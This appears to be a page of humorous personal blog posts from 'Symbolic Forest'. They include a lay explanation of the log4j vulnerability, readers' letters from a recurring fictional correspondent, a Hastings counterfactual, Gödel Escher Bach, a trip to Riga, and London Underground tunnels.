Symbolic Forest

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few handy features that were originally intended to be useful features, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as process your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Keyword noise: programming, software, security, hackers, E Shrdlu.

Time to answer some of the questions that have been sent in over the month or so since I revived this site.

Occasional reader Harold from Winchester read yesterday’s post about the Battle of Hastings and wrote:

Didn’t you write about that before?

Well, yes, it turns out that exactly ten years ago today I also wrote a “what might have happened if the outcome of the Battle of Hastings was different” post, including the same story of how the outcome was nearly different, and the side comments on how the battle has always been treated in English historiography. I suppose, if anything, it’s interesting to read the two side by side and see if my opinions have changed much over the past ten years, or if my writing style has evolved in the meantime too. Let me know if you think it’s better or worse than it used to be.

Regular reader Sarah from Ipswich writes:

Can I come with you on one of your trips to Wales?

Frankly, I wish I was going to Wales in the near future. All the nearby bits of Wales are closed to visitors at the moment, though. At some point I need to get myself back up to North-West Wales and visit the trains again, of course. Hopefully that will happen, even if it doesn’t now happen this year. As for the nearer bits of Wales: well, we’ll have to see how things progress I suppose.

And finally, long time reader E Shrdlu of Clacton writes:

Now you’ve brought this website back from the dead, are you still going to keep up the same running jokes and bring back all those series of posts you used to do years and years ago, like reviewing books you hadn’t finished?

Back in the mists of time I did indeed write reviews of books I hadn’t finished reading. I suppose you could call it a deconstruction of sorts, or an exercise in honesty, because they were at least all (I think) books I had tried to read, and failed to finish. Investigating why I failed to finish a particular book is interesting in itself, and admitting I didn’t finish it is more honest than just writing a review and saying “this is a bad book”. Moreover, if you read through those posts, you’ll see there were a broad range of different reasons for not finishing each book. One of them ended up being found by its author, who I had carefully not accused of plagiarism because I knew he was a former top barrister with lots more money than me.

I have to admit, I’m in the middle of drafting the next Books I Haven’t Read article. It’s probably going to be quite a long article, because it’s about quite a long book. I’ve also made sure it’s by a safely-dead author, so I can freely express my opinions about their poor understanding of archaeology or their failed attempt at polyamory. Feel free to guess who, and what, it’s going to be about; it’s a complex book, a complex topic, and it’s probably going to take me a while to finish it.

Keyword noise: Readers Letters, Battle of Hastings, history, counterfactual, alternate timeline, Cymru, Wales, Books I Haven't Read, Francis Bennion, E Shrdlu, blogging, Sarah from Ipswich.

Things go around in circles. This site has been quiet for a while in the past, more than once, and it will probably happen again in the future at some point. I can’t tell when, but it will probably happen.

Still, a new year is as good a time for a new start as any, even though I try not to believe in arbitrary starting-points. It’s hard to avoid it at this time of year, though: forced to stay away from work, expected to visit the family, exchange gifts, rest for a week and recover ready for the new year’s start. I’ve been staying in and reading one of the books I received for Christmas: Gödel, Escher, Bach: an Eternal Golden Braid, by Douglas Hofstadter. It’s a long book, a complex book, and I haven’t finished it yet: but its essence is in loops, looping, and self-referentiality. How self-referentiality is necessary, as a minimum, before self-awareness can occur. It seems like an ideal thing to talk about on a blog which has always been highly aware that it’s a blog, but I’m not sure if I’ve taken in enough of the book to write about it yet. “It’s got a lot of equations in it,” said The Mother, giving it to me. It does have, true; it also has some truly awful puns, intertwined and nested ideas, and dialogues between fictional and/or appropriated characters who butt into the discussion on a regular basis.

Funnily enough, a letter came the other day from regular reader E. Shrdlu of Clacton-on-Sea…

The Plain People Of The Internet: Hurrah! We were wondering when that chap would pop up again. We were worried he’d got stuck putting shapes into boxes, or analysing what kind of linoleum he has in his kitchen.

Hush, you. As I was saying, a letter came, from semi-regular reader E. Shrdlu of Clacton-on-Sea:

“Gödel, Escher, Bach” is quite a work to try to emulate, isn’t it? Maybe you should try something simpler. Never mind the parallels between human consciousness, a baroque composer and a 20th-century artist: have you thought about the links between something simpler, like TV ghost stories and the British railway preservation movement? Or maybe: the parallels between the work of Robert Graves and books like “Holy Blood, Holy Grail”. Something nice and straightforward like that.

It’s an interesting idea there. Maybe I should indeed be starting off along those lines. Over the next few weeks and months, I’ll be writing a critique of a piece of writing I read for the first time a few days ago. It starts like this:

Things go around in circles. This site has been quiet for a while in the past, more than once, and it will probably happen again in the future at some point. I can’t tell when, but it will probably happen.

Still, a new year is as good a time for a new start as any, even though I try not to believe in arbitrary starting-points…

Somehow, I think I might be onto something.

Keyword noise: Yuletide, Christmas, circularity, Douglas Hofstadter, E Shrdlu, The Plain People Of The Internet, Godel Escher Bach, infinite loop, ouroboros, self-reference.

I’ve already told this to just about everyone, because I’m bouncing up and down already. In a few weeks time, we’re off on holiday. To Riga! I thought I’d mention it here, though, just to say: if any readers know anything good to do in Riga in winter, let me know. I know it’s a long-shot, but you never know who reads this and where they’ve been.

Mr E Shrdlu of Clacton writes: “I’ve been to Clacton!”

Yes, I know you have. Shush there.

Keyword noise: E Shrdlu, holiday, Latvia, Riga, travel.

Here at Symbolic Towers, we pay attention to our readers. If they send in tips, we pass them on. Mr E Shrdlu of Clacton writes…

The Plain People of the Internet: You say what? You had a letter? From a reader? Whose name is E Shrdlu? Honestly?

Me: Shush there. Be quiet and listen.

The Plain People of the Internet: If you say so. But don’t expect us to believe it.

… E Shrdlu of Clacton, who writes:

People who liked Friday’s post may be interested in…

The Plain People of the Internet: You mean, people who like long posts about the history of the London Underground? When posts like yesterday’s get a much better reader reaction? What are you thinking about?

Me: Come on there, stop interrupting. And since when have I been bothered about reader reaction, in any case?

The Plain People of the Internet: We’re only saying. Offering a tidbit ourselves, you could say.

… may be interested in the book London’s Secret Tubes by Emmerson and Beard, which goes into all that stuff. At book length.

The Plain People of the Internet: Now, we wouldn’t mind seeing photos of that beautiful Yorkshire scenery you were wittering on about. That “unutterable beauty” stuff.

Me: It was “unassuming beauty”. And I don’t have any – the car would have rolled down the hill. Carnage.

The Plain People of the Internet: My god, that’s terrible. The joke, we mean.

Me: If you’re so plural, shouldn’t that be “our god?”. The best I can do is photos of trains down in the mist-filled dale. And why shouldn’t there be real people called E Shrdlu, from Clacton?

The Plain People of the Internet: Flann O’Brien would sue, were he still alive.

Keyword noise: E Shrdlu, The Plain People Of The Internet, Grosmont, London, London Underground, nonsense, North Yorkshire Moors Railway, NYMR, photography, railway, secret, secret tunnels, trains, underground, Yorkshire.